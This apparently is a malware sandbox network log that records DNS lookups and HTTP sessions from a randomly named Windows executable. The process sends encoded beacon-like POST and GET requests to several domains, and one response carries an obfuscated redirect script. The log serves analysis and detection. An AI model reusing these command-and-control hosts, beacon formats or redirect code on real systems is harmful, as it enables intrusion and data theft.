                  Jul 2, 2024 13:54:03.771397114 CEST | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:03.891377926 CEST | 80 | 49736 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:03.891573906 CEST | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:03.924988985 CEST | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:03.929771900 CEST | 80 | 49736 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:04.429312944 CEST | 80 | 49736 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:04.429393053 CEST | 80 | 49736 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:04.429594040 CEST | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:05.438705921 CEST | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:06.882581949 CEST | 49737 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:06.887476921 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:06.887553930 CEST | 49737 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:06.911597967 CEST | 49737 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:06.916413069 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:06.916513920 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:07.978430986 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:07.978528023 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:07.978537083 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:07.978718042 CEST | 49737 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:07.979111910 CEST | 80 | 49737 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:07.979222059 CEST | 49737 | 80 | 192.168.2.6 | 74.208.236.230
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 2, 2024 13:53:25.608663082 CEST | 62161 | 53 | 192.168.2.6 | 1.1.1.1
                  Jul 2, 2024 13:53:25.655145884 CEST | 53 | 62161 | 1.1.1.1 | 192.168.2.6
                  Jul 2, 2024 13:53:46.401879072 CEST | 61842 | 53 | 192.168.2.6 | 1.1.1.1
                  Jul 2, 2024 13:53:46.803977966 CEST | 53 | 61842 | 1.1.1.1 | 192.168.2.6
                  Jul 2, 2024 13:54:01.165091038 CEST | 65530 | 53 | 192.168.2.6 | 1.1.1.1
                  Jul 2, 2024 13:54:01.188201904 CEST | 53 | 65530 | 1.1.1.1 | 192.168.2.6
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 2, 2024 13:53:25.608663082 CEST | 192.168.2.6 | 1.1.1.1 | 0x76f0 | Standard query (0) | www.costmoon.com | A (IP address) | IN (0x0001) | false
                  Jul 2, 2024 13:53:46.401879072 CEST | 192.168.2.6 | 1.1.1.1 | 0xe2f | Standard query (0) | www.6171nvuhb.rent | A (IP address) | IN (0x0001) | false
                  Jul 2, 2024 13:54:01.165091038 CEST | 192.168.2.6 | 1.1.1.1 | 0x536d | Standard query (0) | www.motorsportgives.com | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 2, 2024 13:53:25.655145884 CEST | 1.1.1.1 | 192.168.2.6 | 0x76f0 | No error (0) | www.costmoon.com | | 74.208.236.38 | A (IP address) | IN (0x0001) | false
                  Jul 2, 2024 13:53:46.803977966 CEST | 1.1.1.1 | 192.168.2.6 | 0xe2f | No error (0) | www.6171nvuhb.rent | | 142.202.6.230 | A (IP address) | IN (0x0001) | false
                  Jul 2, 2024 13:54:01.188201904 CEST | 1.1.1.1 | 192.168.2.6 | 0x536d | No error (0) | www.motorsportgives.com | | 74.208.236.230 | A (IP address) | IN (0x0001) | false
                  • www.costmoon.com
                  • www.6171nvuhb.rent
                  • www.motorsportgives.com
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.6 | 49727 | 74.208.236.38 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:53:25.871349096 CEST | 541 | OUT | GET /9m56/?Stux7=wSNNrhltoDErcnEw+GwIxBUk+E+vX1/TDY+0HSDY/xjQqFM+lgiwoO4LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPNkNvcw4gdSknrLieRXJ4XwgsEWF+LJyDECQspbYqq9pNrRLiTEI=&YF9Df=_VBD7fO8YfupmT HTTP/1.1
                  Host: www.costmoon.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Jul 2, 2024 13:53:26.306562901 CEST | 770 | IN | HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Content-Length: 626
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:53:26 GMT
                  Server: Apache
                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.6 | 49730 | 142.202.6.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:53:46.839272022 CEST | 799 | OUT | POST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 210
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Ascii: Stux7=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvER16XpKfTp1IW6PTl3qieLoU41UNI7ikPwIBNwbdWAiM
                  Jul 2, 2024 13:53:48.071429968 CEST | 744 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.6 | 49731 | 142.202.6.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:53:49.739854097 CEST | 823 | OUT | POST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 234
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Ascii: Stux7=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8G1yQCgqpSVhF+b+g/scykHwfWDatCL6/HlrfHrXXjjCh7CtKVCBWNbmEk7R1Va4rJn5BmZmgPnGGWncYrkAsfF+IuIQgNPyNmL22o9AcDz1VAhv5jX463mIiVneoSuTIJJTMOJ5EqBMbIW43M/IbiONwwBfnX6Z0HvsVeewVApJDNbLJB/MMei2w==
                  Jul 2, 2024 13:53:51.589421034 CEST | 744 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Jul 2, 2024 13:53:51.590509892 CEST | 744 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.6 | 49732 | 142.202.6.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:53:52.318998098 CEST | 1836 | OUT | POST /hqcp/ HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.6171nvuhb.rent
                  Referer: http://www.6171nvuhb.rent/hqcp/
                  Content-Length: 1246
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Jul 2, 2024 13:53:53.554630041 CEST | 744 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.6 | 49733 | 142.202.6.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:53:54.891246080 CEST | 543 | OUT | GET /hqcp/?Stux7=a7ZQHf8WLvhHVBver5nOwZih6r/S4XIGgVvybuFCKLHzqS2zk6yuhV2s1hLkbw5zmPfcdtbcw9raqNmLcm/5Ggyq9qBeDFk3p2MLA1pm9c8F5HyDpkyVADePZbSIOvXG2KyhUgY=&YF9Df=_VBD7fO8YfupmT HTTP/1.1
                  Host: www.6171nvuhb.rent
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Jul 2, 2024 13:53:56.117063046 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Server: nginx
                  Date: Tue, 02 Jul 2024 11:53:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Data Ascii: 552<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?7758179a36947d1ed305205311f9e27d"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e87 [TRUNCATED]
                  Jul 2, 2024 13:53:56.117083073 CEST | 319 | IN | Data Raw: 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c
                  Data Ascii: nt.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.bztqk.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(func


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.6 | 49735 | 74.208.236.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:54:01.230233908 CEST | 814 | OUT | POST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 210
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Ascii: Stux7=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwiXsF2QYO3KJdzkavxlfl3LnvaP7l6DUwwfNi6+XBzmzc
                  Jul 2, 2024 13:54:01.751252890 CEST | 580 | IN | HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:01 GMT
                  Server: Apache
                  Content-Encoding: gzip


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.6 | 49736 | 74.208.236.230 | 80 | 5700 | C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 13:54:03.924988985 CEST | 838 | OUT | POST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 234
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 55 54 6e 57 2b 6c 4a 74 67 5a 59 6b 6b 56 6e 61 67 64 6c 6e 4a 70 65 7a 4d 51 73 41 6c 69 4e 77 53 35 6e 6b 4e 47 62 36 74 65 63 2f 59 79 53 31 2f 2b 44 47 31 78 6a 65 47 59 2f 61 77 6e 4b 74 77 59 46 46 6a 4a 4a 39 62 6f 6f 41 67 74 41 46 70 6d 7a 43 6a 33 77 4b 75 4c 50 59 59 36 45 67 4f 46 50 59 6f 2f 38 48 68 2b 4c 5a 53 31 7a 39 74 6c 36 65 52 70 73 45 64 49 2b 7a 45 4d 68 74 31 6d 32 53 62 31 74 57 66 47 6c 62 48 74 61 4e 6a 58 36 6a 55 61 79 66 31 69 6f 70 62 6d 38 53 57 2f 4c 46 2f 35 62 58 49 4b 48 64 61 71 76 67 42 32 6d 55 66 39 69 77 3d 3d
                  Data Ascii: Stux7=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNUTnW+lJtgZYkkVnagdlnJpezMQsAliNwS5nkNGb6tec/YyS1/+DG1xjeGY/awnKtwYFFjJJ9booAgtAFpmzCj3wKuLPYY6EgOFPYo/8Hh+LZS1z9tl6eRpsEdI+zEMht1m2Sb1tWfGlbHtaNjX6jUayf1iopbm8SW/LF/5bXIKHdaqvgB2mUf9iw==
                  Timestamp:Jul 2, 2024 13:54:04.429312944 CEST
                  Bytes transferred:580
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:04 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                  Session ID:7
                  Source IP:192.168.2.6
                  Source Port:49737
                  Destination IP:74.208.236.230
                  Destination Port:80
                  Timestamp:Jul 2, 2024 13:54:06.911597967 CEST
                  Bytes transferred:1851
                  Direction:OUT
                  Data:POST /9qp3/ HTTP/1.1
                  Host: www.motorsportgives.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.motorsportgives.com
                  Referer: http://www.motorsportgives.com/9qp3/
                  Content-Length: 1246
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: max-age=0
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                  Data Raw: 53 74 75 78 37 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 4d 54 6e 67 79 6c 49 4f 49 5a 5a 6b 6b 56 34 71 67 63 6c 6e 4a 6f 65 7a 45 55 73 41 6f 66 4e 32 65 35 6d 42 42 47 65 49 56 65 56 2f 59 79 64 56 2f 2f 64 32 31 6b 6a 65 57 63 2f 5a 59 6e 4b 74 77 59 46 44 48 4a 41 50 7a 6f 76 77 67 75 44 46 70 55 33 43 6a 54 77 4b 32 62 50 59 56 42 46 51 75 46 50 34 34 2f 2f 78 56 2b 55 4a 53 33 2b 64 74 39 36 65 64 4d 73 45 42 2b 2b 77 5a 70 68 71 64 6d 30 45 79 77 34 33 66 53 2b 49 65 4d 50 74 37 65 6a 33 49 36 32 4e 68 44 6b 4b 54 67 2b 51 4b 38 4a 41 7a 2b 59 6d 70 32 45 4f 47 51 76 6e 4e 67 6b 67 44 74 32 53 4f 63 6a 41 64 77 31 6a 32 63 4d 4f 56 4b 44 6a 4e 6b 5a 42 62 73 66 61 70 37 6c 49 58 4e 64 48 44 33 5a 52 34 30 64 67 55 4f 75 78 31 6c 65 30 6f 7a 64 51 2f 2f 44 42 56 46 75 5a 62 50 48 67 74 4f 41 72 70 44 47 78 33 7a 55 33 68 36 58 2f 4a 57 70 53 62 54 67 44 53 77 65 62 79 65 4c 70 38 72 6e 6b 45 55 2b 7a 73 75 [TRUNCATED]
                  Data Ascii: Stux7=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNMTngylIOIZZkkV4qgclnJoezEUsAofN2e5mBBGeIVeV/YydV//d21kjeWc/ZYnKtwYFDHJAPzovwguDFpU3CjTwK2bPYVBFQuFP44//xV+UJS3+dt96edMsEB++wZphqdm0Eyw43fS+IeMPt7ej3I62NhDkKTg+QK8JAz+Ymp2EOGQvnNgkgDt2SOcjAdw1j2cMOVKDjNkZBbsfap7lIXNdHD3ZR40dgUOux1le0ozdQ//DBVFuZbPHgtOArpDGx3zU3h6X/JWpSbTgDSwebyeLp8rnkEU+zsuNcOGjbbDzat/W/4lsYhNFdszS0awXDeRUsfjm1lR/7Mgt3mYY62nZOEAk/0cS3fRoi5QJW5tyNuWKgBP3+3pXMxozH5Zp9ynpyduvfnlrCpodPVX+L4pkHpwzIFIbyhzuLmVZVQPMnqDoJ2/lLXdgIkKshrPrGn74ALK3PusxyS7EeV6i6tkI4QKPDPRpyUe7wVWggRdTLc4OaV7z/N/53HIymBTrHyIs+buAUAaMn8t+MQJgnwHLfpsKg3lSvF4VpDY7VxjtKubysHoUQjxephkolhcZx5+Ri1GxD4CdvOsudkIV7ebF29H2S68f08LDYjNxdx1yH9tIiaURvkmK421+Vt1x8AL/Phs4P8xDuSIIHssQ/Zi7P+/UOAW3OPKFIrHqyQgzDJgvRY1J4ckUwwwYTDTF0vlq/DY4RMTzIBnmXSGrHB6lK3IItyBd141Wj+LacPh8KBSlyT9J8ARrTjaR1gRSrONSCqeQSnJN2fzqA7ex2t8XIPs0gFK4TIN14oNj+D0bmQp55R2pK6VUPclNvvBdP+rzElPIrNoahEphNEsGRVLty+grf9jyENSPSP/Q2flYg6irovfkP0YoZOriXXGQT6FUTl9fVpP1HWNip+2Q5vE5Q0TS7UgbZv3ZBG+KhnjkxvvepaGKRQwjeI7BbvEPzyF90 [TRUNCATED]
                  Timestamp:Jul 2, 2024 13:54:07.978430986 CEST
                  Bytes transferred:580
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:07 GMT
                  Server: Apache
                  Content-Encoding: gzip
                  Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                  Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
                  Timestamp:Jul 2, 2024 13:54:07.979111910 CEST
                  Bytes transferred:580
                  Direction:IN
                  Data:HTTP/1.1 404 Not Found
                  Content-Type: text/html
                  Transfer-Encoding: chunked
                  Connection: close
                  Date: Tue, 02 Jul 2024 11:54:07 GMT
                  Server: Apache
                  Content-Encoding: gzip
